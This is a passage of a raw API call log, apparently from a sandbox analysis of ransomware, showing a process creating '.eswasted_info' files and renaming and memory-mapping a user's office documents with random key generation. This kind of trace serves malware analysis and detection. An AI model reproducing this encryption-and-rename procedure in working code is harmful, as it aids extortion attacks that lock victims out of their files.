halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\cwbgk3bmlvy0 u.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\CWbgK3bmlvY0 u.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\cwbgk3bmlvy0 u.pps.eswasted")) returned 1 [0075.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\CWbgK3bmlvY0 u.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\cwbgk3bmlvy0 u.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.324] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0075.324] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xd23a [0075.324] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd23a) returned 0x330000 [0075.324] CloseHandle (hObject=0x108) returned 1 [0075.327] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.328] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0075.328] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.328] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.329] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.329] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.397] SetEndOfFile (hFile=0x11c) returned 1 [0075.401] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.402] CloseHandle (hObject=0x11c) returned 1 [0075.406] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6880 | out: hHeap=0x6d0000) returned 1 [0075.406] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719e38 | out: hHeap=0x6d0000) returned 1 [0075.406] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f0e0) returned 1 [0075.407] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.407] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\HFxkd.pptx") returned 99 [0075.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2d0) returned 0x70c160 [0075.407] lstrcpyW (in: lpString1=0x70c226, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.407] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.450] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f0e0) returned 1 [0075.450] CryptGenRandom (in: hProv=0x70f0e0, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.450] CryptReleaseContext (hProv=0x70f0e0, dwFlags=0x0) returned 1 [0075.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\HFxkd.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\hfxkd.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.497] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.498] SetEndOfFile (hFile=0x108) returned 1 [0075.499] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.499] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.499] lstrcpyW (in: lpString1=0x70c226, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.499] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\HFxkd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\hfxkd.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\HFxkd.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\hfxkd.pptx.eswasted")) returned 1 [0075.499] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\HFxkd.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\hfxkd.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.499] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.500] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x16293 [0075.500] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16293) returned 0x330000 [0075.500] CloseHandle (hObject=0x11c) returned 1 [0075.506] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.507] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.507] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.507] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.508] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.508] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.518] SetEndOfFile (hFile=0x108) returned 1 [0075.520] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.520] CloseHandle (hObject=0x108) returned 1 [0075.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0075.522] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a620 | out: hHeap=0x6d0000) returned 1 [0075.522] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.523] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.523] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.523] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\NH2vVFiCdhqIh.xlsx") returned 107 [0075.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e0) returned 0x70c160 [0075.523] lstrcpyW (in: lpString1=0x70c236, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.523] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.523] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.588] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.588] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\NH2vVFiCdhqIh.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\nh2vvficdhqih.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.588] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.590] SetEndOfFile (hFile=0x108) returned 1 [0075.591] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.591] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.591] lstrcpyW (in: lpString1=0x70c236, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\NH2vVFiCdhqIh.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\nh2vvficdhqih.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\NH2vVFiCdhqIh.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\nh2vvficdhqih.xlsx.eswasted")) returned 1 [0075.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\39Tsq\\NH2vVFiCdhqIh.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\39tsq\\nh2vvficdhqih.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.591] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.592] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x16f49 [0075.592] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16f49) returned 0x330000 [0075.592] CloseHandle (hObject=0x130) returned 1 [0075.597] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.598] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.598] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.598] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.599] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.599] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.607] SetEndOfFile (hFile=0x108) returned 1 [0075.609] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.609] CloseHandle (hObject=0x108) returned 1 [0075.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0075.611] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a740 | out: hHeap=0x6d0000) returned 1 [0075.611] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.613] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.613] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\6xH3onikOGTYsP3Z9yC.pps") returned 106 [0075.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2de) returned 0x71a4e0 [0075.613] lstrcpyW (in: lpString1=0x71a5b4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.613] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.613] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.614] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.614] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.614] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\6xH3onikOGTYsP3Z9yC.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\6xh3onikogtysp3z9yc.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.615] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.620] SetEndOfFile (hFile=0x108) returned 1 [0075.620] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.620] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.620] lstrcpyW (in: lpString1=0x71a5b4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\6xH3onikOGTYsP3Z9yC.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\6xh3onikogtysp3z9yc.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\6xH3onikOGTYsP3Z9yC.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\6xh3onikogtysp3z9yc.pps.eswasted")) returned 1 [0075.621] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\6xH3onikOGTYsP3Z9yC.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\6xh3onikogtysp3z9yc.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.621] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.621] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x123e0 [0075.621] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x123e0) returned 0x330000 [0075.621] CloseHandle (hObject=0x11c) returned 1 [0075.625] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.626] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.627] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.627] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.627] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.627] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.637] SetEndOfFile (hFile=0x108) returned 1 [0075.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.639] CloseHandle (hObject=0x108) returned 1 [0075.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a4e0 | out: hHeap=0x6d0000) returned 1 [0075.640] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0075.640] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.641] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.641] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.641] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\aLOXIX3c-.ots") returned 96 [0075.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ca) returned 0x71a4e0 [0075.641] lstrcpyW (in: lpString1=0x71a5a0, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.641] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.641] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.642] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.642] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\aLOXIX3c-.ots.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\aloxix3c-.ots.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.643] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.644] SetEndOfFile (hFile=0x108) returned 1 [0075.644] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.644] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.644] lstrcpyW (in: lpString1=0x71a5a0, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\aLOXIX3c-.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\aloxix3c-.ots"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\aLOXIX3c-.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\aloxix3c-.ots.eswasted")) returned 1 [0075.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\SYwLmRQpeBwfxW_093\\aLOXIX3c-.ots.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\sywlmrqpebwfxw_093\\aloxix3c-.ots.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.645] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.645] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0xf53 [0075.645] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf53) returned 0x330000 [0075.645] CloseHandle (hObject=0x130) returned 1 [0075.647] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.648] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.648] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.648] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.649] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.649] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.659] SetEndOfFile (hFile=0x108) returned 1 [0075.662] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.662] CloseHandle (hObject=0x108) returned 1 [0075.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a4e0 | out: hHeap=0x6d0000) returned 1 [0075.663] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a3b8 | out: hHeap=0x6d0000) returned 1 [0075.663] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.715] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.715] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\-vqTeAwa6Vyq.ods") returned 98 [0075.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ce) returned 0x70c160 [0075.716] lstrcpyW (in: lpString1=0x70c224, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0075.716] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.716] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0075.716] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\-vqTeAwa6Vyq.ods.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js 